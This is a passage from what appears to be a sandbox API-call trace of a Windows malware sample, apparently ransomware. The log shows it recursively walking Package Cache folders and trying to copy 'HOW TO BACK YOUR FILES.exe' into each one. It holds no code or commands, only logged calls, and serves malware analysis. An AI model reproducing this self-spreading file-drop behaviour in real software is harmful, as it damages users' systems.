GetLastError () returned 0x0 [0090.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.039] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.039] CloseHandle (hObject=0x120) returned 1 [0090.039] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.039] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5e6ae480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6ae480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.039] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.039] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.039] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0090.039] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0090.039] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.040] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.040] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.040] GetLastError () returned 0x0 [0090.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.040] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.040] CloseHandle (hObject=0x120) returned 1 [0090.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.041] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.041] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.041] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.041] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0090.041] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0090.041] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.041] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.042] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.042] GetLastError () returned 0x0 [0090.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.042] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.042] CloseHandle (hObject=0x120) returned 1 [0090.042] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.042] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.042] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.042] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.042] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0090.043] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0090.043] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.043] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.043] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.043] GetLastError () returned 0x0 [0090.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.044] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.044] CloseHandle (hObject=0x120) returned 1 [0090.044] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.044] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5f248fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f248fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.044] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.044] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.044] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0090.044] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0090.044] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.044] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.045] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.045] GetLastError () returned 0x0 [0090.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.045] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.045] CloseHandle (hObject=0x120) returned 1 [0090.045] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.045] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.046] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.046] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.046] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0090.046] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0090.046] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.046] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.046] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.047] GetLastError () returned 0x0 [0090.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.047] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.047] CloseHandle (hObject=0x120) returned 1 [0090.047] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.047] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.047] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.047] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.047] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0090.047] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0090.048] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.048] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.048] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.048] GetLastError () returned 0x0 [0090.048] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.048] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.048] CloseHandle (hObject=0x120) returned 1 [0090.049] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.049] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5f8fada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f8fada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.049] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.049] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.049] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0090.049] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0090.049] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.049] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.050] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.050] GetLastError () returned 0x0 [0090.050] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.050] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.050] CloseHandle (hObject=0x120) returned 1 [0090.050] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.050] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.050] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.050] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.051] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0090.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0090.051] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.051] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.051] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.051] GetLastError () returned 0x0 [0090.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.051] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.052] CloseHandle (hObject=0x120) returned 1 [0090.052] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.052] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package 